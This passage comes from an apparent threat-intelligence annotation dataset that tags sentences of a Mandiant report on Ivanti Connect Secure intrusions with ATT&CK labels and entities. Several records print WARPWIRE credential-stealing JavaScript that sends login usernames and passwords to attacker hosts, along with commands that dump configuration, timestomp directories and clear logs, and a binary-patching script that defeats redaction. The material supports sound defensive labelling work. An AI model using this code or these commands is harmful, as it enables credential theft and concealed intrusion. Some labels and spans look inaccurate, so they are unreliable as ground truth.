"sentence_id": 88, "context_before": "Although the message structure is designed to be flexible, this instance of the malware expects the first message to specify length 0x10.", "sentence_text": "Additionally, the data after the decryption must be exactly as shown in Figure 14 or the malware terminates the connection.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1094", "name": "Custom Command and Control Protocol" } ], "procedure": "terminates the connection on invalid data", "entities": [ { "text": "malware", "start": 89, "end": 96, "label": "MalwareTool" }, { "text": "terminates the connection", "start": 97, "end": 122, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s89-f49eeb", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "Additionally, the data after the decryption must be exactly as shown in Figure 14 or the malware terminates the connection.", "sentence_text": "The bytes shown in black are non-consequential padding values and the yy values (amber) specify the HMAC signature for the message.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1094", "name": "Custom Command and Control Protocol" } ], "procedure": "yy values specify the HMAC signature for the message", "entities": [ { "text": "HMAC signature", "start": 100, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "specify", "start": 88, "end": 95, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s90-f62cde", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "The bytes shown in black are non-consequential padding values and the yy values (amber) specify the HMAC signature for the message.", "sentence_text": "If the first message passes the integrity checks, the malware first encrypts the buffer in Figure 14, and then sends it back to the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "encrypts the buffer and sends it back to the C2 server", "entities": [ { "text": "malware", "start": 54, "end": 61, "label": "MalwareTool" }, { "text": "first message", "start": 7, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "buffer", "start": 81, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "C2 server", "start": 132, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "passes the integrity checks", "start": 21, "end": 48, "label": "Action" }, { "text": "sends it back", "start": 111, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s91-91ef2d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "If the first message passes the integrity checks, the malware first encrypts the buffer in Figure 14, and then sends it back to the C2 server.", "sentence_text": "That message contains a single meaningful byte (apart from the padding and the HMAC signature) which is the index of the command to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1094", "name": "Custom Command and Control Protocol" } ], "procedure": "send command index for execution", "entities": [ { "text": "executed", "start": 135, "end": 143, "label": "Action" }, { "text": "message", "start": 5, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "single meaningful byte", "start": 24, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "HMAC signature", "start": 79, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "index of the command", "start": 108, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s92-fdd5f0", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "That message contains a single meaningful byte (apart from the padding and the HMAC signature) which is the index of the command to be executed.", "sentence_text": "The message must be formatted in the same way as the previous one with only the first 3 bytes being meaningful (the length and the command).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s93-e0ecde", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "The message must be formatted in the same way as the previous one with only the first 3 bytes being meaningful (the length and the command).", "sentence_text": "Additional Findings\nZIPLINE is designed to fork itself twice and continue on its child processes.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "fork itself twice and continue on child processes", "entities": [ { "text": "ZIPLINE", "start": 20, "end": 27, "label": "MalwareTool" }, { "text": "fork itself twice", "start": 43, "end": 60, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s94-b8deae", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "Additional Findings\nZIPLINE is designed to fork itself twice and continue on its child processes.", "sentence_text": "It also uses the setsid command to create a new session for its process, which effectively detaches it from any controlling terminal.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "use setsid to detach from controlling terminal", "entities": [ { "text": "uses the setsid command", "start": 8, "end": 31, "label": "Action" }, { "text": "detaches", "start": 91, "end": 99, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s95-30edd7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "It also uses the setsid command to create a new session for its process, which effectively detaches it from any controlling terminal.", "sentence_text": "Additionally, the malware closes the open handles except for the one associated with the current connection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "close open handles except for C2 connection", "entities": [ { "text": "malware", "start": 18, "end": 25, "label": "MalwareTool" }, { "text": "closes the open handles", "start": 26, "end": 49, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s96-4608ea", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Additionally, the malware closes the open handles except for the one associated with the current connection.", "sentence_text": "The web process must be able to handle the SIGALRM signal because the malware executes the alarm command on a couple of occasions (delayed by three seconds).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute alarm command with SIGALRM", "entities": [ { "text": "web process", "start": 4, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "malware", "start": 70, "end": 77, "label": "MalwareTool" }, { "text": "executes the alarm command", "start": 78, "end": 104, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s97-2fa6ba", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "The web process must be able to handle the SIGALRM signal because the malware executes the alarm command on a couple of occasions (delayed by three seconds).", "sentence_text": "Additionally, the web process terminates itself after executing the specified command, which implies that it would be respawned by the ZIPLINE malware ecosystem on the compromised host in order to keep listening for incoming traffic.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "terminates itself after executing and is respawned to keep listening", "entities": [ { "text": "ZIPLINE", "start": 135, "end": 142, "label": "MalwareTool" }, { "text": "web process", "start": 18, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "terminates itself", "start": 30, "end": 47, "label": "Action" }, { "text": "respawned", "start": 118, "end": 127, "label": "Action" }, { "text": "compromised host", "start": 168, "end": 184, "label": "Infrastructure_Indicator" }, { "text": "keep listening for incoming traffic", "start": 197, "end": 232, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s98-7d451a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "Additionally, the web process terminates itself after executing the specified command, which implies that it would be respawned by the ZIPLINE malware ecosystem on the compromised host in order to keep listening for incoming traffic.", "sentence_text": "WARPWIRE Variants\nWARPWIRE\nacross our response engagements and in the wild.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s99-eabc20", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "WARPWIRE Variants\nWARPWIRE\nacross our response engagements and in the wild.", "sentence_text": "Across these variants, the primary purpose of them has remained to target plaintext passwords and usernames for exfiltration to a hard-coded C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "target plaintext credentials for exfiltration", "entities": [ { "text": "C2 server", "start": 141, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "target", "start": 67, "end": 73, "label": "Action" }, { "text": "exfiltration", "start": 112, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s100-9fc1e4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "Across these variants, the primary purpose of them has remained to target plaintext passwords and usernames for exfiltration to a hard-coded C2 server.", "sentence_text": "The main change across these variants is how credentials are submitted to the hard-coded C2.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "submit credentials to C2", "entities": [ { "text": "C2", "start": 89, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "submitted", "start": 61, "end": 70, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s101-c473a2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "The main change across these variants is how credentials are submitted to the hard-coded C2.", "sentence_text": "In the majority of identified variants, the GET request has been replaced with a POST that submits the credentials in either the POST params or body, however, Mandiant has also identified variants that still utilize a GET request but now include the window.location.href as a submitted value.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "submit credentials via POST or GET request", "entities": [ { "text": "window.location.href", "start": 250, "end": 270, "label": "Infrastructure_Indicator" }, { "text": "ubmits the credentials", "start": 92, "end": 114, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s102-d647f7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "In the majority of identified variants, the GET request has been replaced with a POST that submits the credentials in either the POST params or body, however, Mandiant has also identified variants that still utilize a GET request but now include the window.location.href as a submitted value.", "sentence_text": "Based on the number of variants identified as well as suspected mass exploitation of the related vulnerabilities, Mandiant does not currently attribute all WARPWIRE variants to UNC5221.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "mass exploitation of vulnerabilities", "entities": [ { "text": "UNC5221", "start": 177, "end": 184, "label": "ThreatActor" }, { "text": "WARPWIRE", "start": 156, "end": 164, "label": "MalwareTool" }, { "text": "mass exploitation", "start": 64, "end": 81, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s103-675cb3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Based on the number of variants identified as well as suspected mass exploitation of the related vulnerabilities, Mandiant does not currently attribute all WARPWIRE variants to UNC5221.", "sentence_text": "var ivanti = document.frmLogin.username.value;\nvar login = document.frmLogin.password.value;\nvar action = window.location.href;\nif (ivanti!==\"\" && login!==\"\") { var ivanti = btoa(ivanti);\nvar login = btoa(login);\nvar action = btoa(action);\nconst url = \"https://duorhytm[.]fun/\";\nvar xhr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s104-07ee8e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "var ivanti = document.frmLogin.username.value;\nvar login = document.frmLogin.password.value;\nvar action = window.location.href;\nif (ivanti!==\"\" && login!==\"\") { var ivanti = btoa(ivanti);\nvar login = btoa(login);\nvar action = btoa(action);\nconst url = \"https://duorhytm[.]fun/\";\nvar xhr", "sentence_text": "= new XMLHttpRequest();\nxhr.open(\"POST\", url, false);\nxhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvar params =\"ivanti=\"+ivanti +\"&login=\"+ login+\"&action=\"+action;\nxhr.send(params);\nvar a = document.frmLogin.username.value;\nvar b = document.frmLogin.password.value;\nvar c = window.location.href;\nif (a !== \"\" && b !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s105-714ede", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "= new XMLHttpRequest();\nxhr.open(\"POST\", url, false);\nxhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvar params =\"ivanti=\"+ivanti +\"&login=\"+ login+\"&action=\"+action;\nxhr.send(params);\nvar a = document.frmLogin.username.value;\nvar b = document.frmLogin.password.value;\nvar c = window.location.href;\nif (a !== \"\" && b !", "sentence_text": "== \"\") { var aEncoded = btoa(a);\nvar bEncoded = btoa(b);\nvar cEncoded = btoa(c);\nconst url = \"https://clicko[.]click/?a=\" + aEncoded + \"&b=\" +", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s106-29cc87", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "== \"\") { var aEncoded = btoa(a);\nvar bEncoded = btoa(b);\nvar cEncoded = btoa(c);\nconst url = \"https://clicko[.]click/?a=\" + aEncoded + \"&b=\" +", "sentence_text": "bEncoded + \"&c=\" + cEncoded;\nvar xhr", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s107-80ff54", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "bEncoded + \"&c=\" + cEncoded;\nvar xhr", "sentence_text": "= new XMLHttpRequest();\nxhr.open(\"GET\", url, false);\nxhr.send(null);\nvar uParam = document.frmLogin.username.value;\nvar pParam = document.frmLogin.password.value;\nif (uParam && pParam) { var xhr = new XMLHttpRequest();\nconst url = `https://www.miltonhouse[.]nl/pub/opt/processor.php` const body = `h=${btoa(document.location.hostname)}&u =${btoa(uParam)}&p=${btoa(pParam)}`;\nxhr.open('POST', url, true);\nxhr.setRequestHeader\n('Content-type', 'application/x-www-form-urlencoded');\nxhr.send(body);\nvar ivanti = document.frmLogin.username.value;\nvar login = document.frmLogin.password.value;\nvar action = window.location.href;\nif (ivanti!==\"\" && login!==\"\") { var ivanti = btoa(ivanti);\nvar login = btoa(login);\nvar action = btoa(action);\nconst url = \"https://cpanel.netbar[.]org/assets/js/xml.php\";\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", url, false);\nxhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvar params =\"ivanti=\"+ivanti +\"&login=\"+ login+\"&action=\"+action;\nxhr.send(params);\n}\nUsage of Open-Source Tooling Across our incident response engagements, Mandiant identified multiple open-source tools utilized to support post-exploitation activity on Ivanti CS appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s108-e6e128", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "= new XMLHttpRequest(); xhr.open(\"GET\", url, false); xhr.send(null); var uParam = document.frmLogin.username.value; var pParam = document.frmLogin.password.value; if (uParam && pParam) { var xhr = new XMLHttpRequest(); const url = `https://www.miltonhouse[.]nl/pub/opt/processor.php` const body = `h=${btoa(document.location.hostname)}&u =${btoa(uParam)}&p=${btoa(pParam)}`; xhr.open('POST', url, true); xhr.setRequestHeader ('Content-type', 'application/x-www-form-urlencoded'); xhr.send(body); var ivanti = document.frmLogin.username.value; var login = document.frmLogin.password.value; var action = window.location.href; if (ivanti!==\"\" && login!==\"\") { var ivanti = btoa(ivanti); var login = btoa(login); var action = btoa(action); const url = \"https://cpanel.netbar[.]org/assets/js/xml.php\"; var xhr = new XMLHttpRequest(); xhr.open(\"POST\", url, false); xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\"); var params =\"ivanti=\"+ivanti +\"&login=\"+ login+\"&action=\"+action; xhr.send(params); } Usage of Open-Source Tooling Across our incident response engagements, Mandiant identified multiple open-source tools utilized to support post-exploitation activity on Ivanti CS appliances.", "sentence_text": "These tools were associated with internal network reconnaissance, lateral movement, and data exfiltration within a limited number of victim environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s109-9f06b0", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "These tools were associated with internal network reconnaissance...", "sentence_text": "Additional TTPs Configuration and Cache Theft dsls command found on CS appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s110-995270", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Additional TTPs\nConfiguration and Cache Theft dsls command found on CS appliances.", "sentence_text": "The resulting output is saved to a tar archive masquerading as a randomly generated 10-character CSS file within the directory:\n/home/webserver/htdocs/dana-na/css/\nWe have identified the following sequence of commands (Figure 19) executed on a compromised appliance to dump the cache and configuration into the CSS directory.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Executed commands on a compromised appliance to dump cache and configuration data into a directory.", "entities": [ { "text": "executed on a compromised appliance", "start": 230, "end": 265, "label": "Action" }, { "text": "dump the cache and configuration", "start": 269, "end": 301, "label": "Action" }, { "text": "/home/webserver/htdocs/dana-na/css/", "start": 128, "end": 163, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s113-11f5e6", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "-R -B /vc", "sentence_text": ">/tmp/test1.txt;\nrm -rf /tmp/tools;\ntouch /tmp/testt -r /home/webserver/htdocs/dana-na/css;\nmount -o rw,remount /;\ntar czf /home/webserver/htdocs/dana-na/css/.css /tmp/test1.txt;\nrm -rf /tmp/test1.txt;\nThe command sequence executes a Base64-encoded Python script that writes a patched version of the dsls binary ( /home/bin/dsls ) into /tmp/tools .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "execute script to patch dsls binary and hide data in CSS directory", "entities": [ { "text": "executes a Base64-encoded Python script", "start": 233, "end": 272, "label": "Action" }, { "text": "writes a patched version of the dsls binary", "start": 278, "end": 321, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s114-8f0ef4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": ">/tmp/test1.txt;\nrm -rf /tmp/tools;\ntouch /tmp/testt -r /home/webserver/htdocs/dana-na/css;\nmount -o rw,remount /;\ntar czf /home/webserver/htdocs/dana-na/css/.css /tmp/test1.txt;\nrm -rf /tmp/test1.txt;\nThe command sequence executes a Base64-encoded Python script that writes a patched version of the dsls binary ( /home/bin/dsls ) into /tmp/tools .", "sentence_text": "At a high level, the patched binary allows the dsls command to display sensitive information that is typically redacted.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "patched binary allows the dsls command to display sensitive information", "entities": [ { "text": "display sensitive information", "start": 63, "end": 92, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s115-c0329c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "At a high level, the patched binary allows the dsls command to display sensitive information that is typically redacted.", "sentence_text": "Figure 20 shows the Base64-decoded Python script.\nfrom base64 import b64encode as e f=open('/home/bin/dsls','rb')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s116-109ee4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Figure 20 shows the Base64-decoded Python script.\nfrom base64 import b64encode as e f=open('/home/bin/dsls','rb')", "sentence_text": "c=f.read()\nf.close()\np=c.find(bytes.fromhex('8dbd60ffffff'))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s117-edfc48", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "c=f.read()\nf.close()\np=c.find(bytes.fromhex('8dbd60ffffff'))", "sentence_text": "if p>0:\nd=bytearray(c)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s118-e2a871", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "if p>0:\nd=bytearray(c)", "sentence_text": "if d[p-2]==0x74:\nd[p-2]=0xeb\nf=open('/tmp/tools','wb')\nf.write(d)\nf.close()\ns='f'\nelse:\ns='i'\nelse:\ns='n'\nprint(s,end='')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s119-258f99", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "if d[p-2]==0x74:\nd[p-2]=0xeb\nf=open('/tmp/tools','wb')\nf.write(d)\nf.close()\ns='f'\nelse:\ns='i'\nelse:\ns='n'\nprint(s,end='')", "sentence_text": "The script looks for the byte sequence 0x8dbd60ffffff within the file /home/bin/dsls .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s120-048b35", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "The script looks for the byte sequence 0x8dbd60ffffff within the file /home/bin/dsls .", "sentence_text": "This is a legitimate executable on Ivanti Connect Secure appliances used for displaying the running configuration and cache information.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s121-83fdc3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "This is a legitimate executable on Ivanti Connect Secure appliances used for displaying the running configuration and cache information.", "sentence_text": "If the byte sequence is found ( p>0 ), it creates a byte array ( ) from the file contents ( ) for further modification.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s122-eb8e71", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "If the byte sequence is found ( p>0 ), it creates a byte array ( ) from the file contents ( ) for further modification.", "sentence_text": "The logic then checks if the byte 2 positions before the found byte sequence ( p-2 ) is equal to 0x74 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s123-ef4be4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "The logic then checks if the byte 2 positions before the found byte sequence ( p-2 ) is equal to 0x74 .", "sentence_text": "If it is equal to 0x74 , it replaces that byte with 0xeb .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s124-05bf3d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "If it is equal to 0x74 , it replaces that byte with 0xeb .", "sentence_text": "Lastly, the script rewrites the modified byte array into /tmp/tools", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s125-5d3b2a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "Lastly, the script rewrites the modified byte array into /tmp/tools", "sentence_text": "The modification of the binary turns a conditional JMP instruction ( 0x74 ) into an unconditional JMP ( 0xeb ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s126-f5f34c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "The modification of the binary turns a conditional JMP instruction ( 0x74 ) into an unconditional JMP ( 0xeb ).", "sentence_text": "The patch forces the execution flow to bypass a check in the legitimate dsls binary responsible for redacting sensitive data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Modify execution flow to bypass a security check in the dsls binary to avoid data redaction.", "entities": [ { "text": "forces the execution flow to bypass a check", "start": 10, "end": 53, "label": "Action" }, { "text": "dsls", "start": 72, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s127-11292a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "The patch forces the execution flow to bypass a check in the legitimate dsls binary responsible for redacting sensitive data.", "sentence_text": "This allows for the patched binary to display the value of fields that is typically redacted in the output with ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s128-f00669", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "This allows for the patched binary to display the value of fields that is typically redacted in the output with ", "sentence_text": "The command sequence continues to do the following:\nExecute\n/tmp/tools\n(patched version of /home/bin/dsls ) to dump the configuration and cache to /tmp/test1.txt Remove /tmp/tools Create an empty file /tmp/testt with the modified and access timestamps of /home/webserver/htdocs/dana-na/css/ .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Execute patched dsls tool to dump configuration, remove tool, and create file with modified timestamps to evade detection.", "entities": [ { "text": "Execute\n/tmp/tools\n(patched version of /home/bin/dsls ) to dump the configuration and cache to /tmp/test1.txt", "start": 52, "end": 161, "label": "Action" }, { "text": "Remove /tmp/tools", "start": 162, "end": 179, "label": "Action" }, { "text": "Create an empty file /tmp/testt with the modified and access timestamps of /home/webserver/htdocs/dana-na/css/", "start": 180, "end": 290, "label": "Action" }, { "text": "/tmp/tools", "start": 60, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "/home/bin/dsls", "start": 91, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "/tmp/test1.txt", "start": 147, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "/tmp/tools", "start": 169, "end": 179, "label": "Infrastructure_Indicator" }, { "text": "/tmp/testt", "start": 201, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "/home/webserver/htdocs/dana-na/css/", "start": 255, "end": 290, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s129-2b002f", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "The command sequence continues to do the following:\nExecute\n/tmp/tools\n(patched version of /home/bin/dsls ) to dump the configuration and cache to /tmp/test1.txt Remove /tmp/tools Create an empty file /tmp/testt with the modified and access timestamps of /home/webserver/htdocs/dana-na/css/ .", "sentence_text": "This will be used later to timestomp the CSS directory with its original timestamps.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Use file timestamp manipulation to restore original timestamps of the CSS directory to evade detection.", "entities": [ { "text": "to timestomp the CSS directory with its original timestamps", "start": 24, "end": 83, "label": "Action" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s130-b04661", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "This will be used later to timestomp the CSS directory with its original timestamps.", "sentence_text": "Remount the file system as read-write Archive the dump into a CSS file within /home/webserver/htdocs/dana-na/css/ Delete /tmp/test1.txt rm -rf /home/webserver/htdocs/dana-na/css/.css;\ntouch -r /tmp/testt /home/webserver/htdocs/dana-na/css;\nrm -rf /tmp/testt;\necho > /data/var/dlogs/config_rest_server.log;\nmount -o ro,remount/", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Remount file system, archive data into CSS file, delete artifacts, modify timestamps, clear logs, and remount system to evade detection.", "entities": [ { "text": "Remount the file system as read-write", "start": 0, "end": 37, "label": "Action" }, { "text": "Archive the dump into a CSS file within /home/webserver/htdocs/dana-na/css/", "start": 38, "end": 113, "label": "Action" }, { "text": "Delete /tmp/test1.txt", "start": 114, "end": 135, "label": "Action" }, { "text": "rm -rf /home/webserver/htdocs/dana-na/css/.css", "start": 136, "end": 192, "label": "Action" }, { "text": "touch -r /tmp/testt /home/webserver/htdocs/dana-na/css", "start": 194, "end": 248, "label": "Action" }, { "text": "rm -rf /tmp/testt", "start": 250, "end": 267, "label": "Action" }, { "text": "echo > /data/var/dlogs/config_rest_server.log", "start": 269, "end": 314, "label": "Action" }, { "text": "mount -o ro,remount/", "start": 316, "end": 336, "label": "Action" }, { "text": "/home/webserver/htdocs/dana-na/css/", "start": 78, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "/tmp/test1.txt", "start": 121, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "/home/webserver/htdocs/dana-na/css/.css", "start": 143, "end": 192, "label": 